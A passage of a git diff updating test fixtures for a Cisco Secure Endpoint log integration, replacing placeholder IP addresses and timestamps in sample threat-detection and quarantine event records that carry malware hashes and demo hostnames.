Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6533667579691532306\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", + "ingested": "2021-12-09T13:35:36.337292400Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667579691532000,\"timestamp\":1610705573,\"timestamp_nanoseconds\":747000000,\"date\":\"2021-01-15T10:12:53+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6533667579691532306\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -3667,7 +3667,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3717,7 +3717,7 @@ "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -3734,8 +3734,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:30.174596504Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667579691532000,\"timestamp\":1610705573,\"timestamp_nanoseconds\":371000000,\"date\":\"2021-01-15T10:12:53+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6533667579691532305\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", + "ingested": "2021-12-09T13:35:36.337298300Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667579691532000,\"timestamp\":1610705573,\"timestamp_nanoseconds\":371000000,\"date\":\"2021-01-15T10:12:53+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6533667579691532305\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -3757,7 +3757,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3807,7 +3807,7 @@ "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -3820,8 +3820,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:30.174598519Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667575396565000,\"timestamp\":1610705572,\"timestamp_nanoseconds\":971000000,\"date\":\"2021-01-15T10:12:52+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6533667575396565008\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", + "ingested": "2021-12-09T13:35:36.337304300Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667575396565000,\"timestamp\":1610705572,\"timestamp_nanoseconds\":971000000,\"date\":\"2021-01-15T10:12:52+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6533667575396565008\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -3843,7 +3843,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", diff --git a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp4.log b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp4.log index f31bf18a23a..9e04010b548 100644 --- a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp4.log +++ b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp4.log @@ -1,100 +1,100 @@ -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6508397899087348000,"timestamp":1610659036,"timestamp_nanoseconds":295927133,"date":"2021-01-14T21:17:16+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.6A37D750F0-100.SBX.TG","detection_id":"6508397899087347713","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"resume.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Desktop\\resume.exe","identity":{"sha256":"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86","sha1":"5ca4bef8de6def53519d4b22632675bb4c1e470b","md5":"41476df3138717868118d8542cf3d1d6"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":14930696955218,"timestamp":1610656706,"timestamp_nanoseconds":844899579,"date":"2021-01-14T20:38:26+00:00","event_type":"Executed malware","event_type_id":1107296272,"detection":"W32.E4FCCBFA69-95.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610656706,"start_date":"2021-01-14T20:38:26+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"},"parent":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":587000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6412680266518626319","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":494000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6412680266518626317","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":587000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.E4FCCBFA69-95.SBX.TG","detection_id":"6412680266518626319","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"28242311.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\28242311.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"},"parent":{"process_id":7120,"disposition":"Malicious","file_name":"QuotaGroup.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014","sha1":"f504774b72acfb23a46217aec9c6559fd7e4df64","md5":"b5ede95ec8bc4ad6984758be42b152bd"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":572000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.E4FCCBFA69-95.SBX.TG","detection_id":"6412680266518626318","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"QuotaGroup.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014","sha1":"f504774b72acfb23a46217aec9c6559fd7e4df64","md5":"b5ede95ec8bc4ad6984758be42b152bd"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":494000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.E4FCCBFA69-95.SBX.TG","detection_id":"6412680266518626317","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"28242311.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\28242311.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"},"parent":{"process_id":4788,"disposition":"Malicious","file_name":"28242311.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":478000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.E4FCCBFA69-95.SBX.TG","detection_id":"6412680266518626316","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"28242311.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\28242311.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014","sha1":"f504774b72acfb23a46217aec9c6559fd7e4df64","md5":"b5ede95ec8bc4ad6984758be42b152bd"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":587000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6412680266518626318","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":494000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6412680266518626316","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303574240493599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303574240493597","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526295","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526294","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526293","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 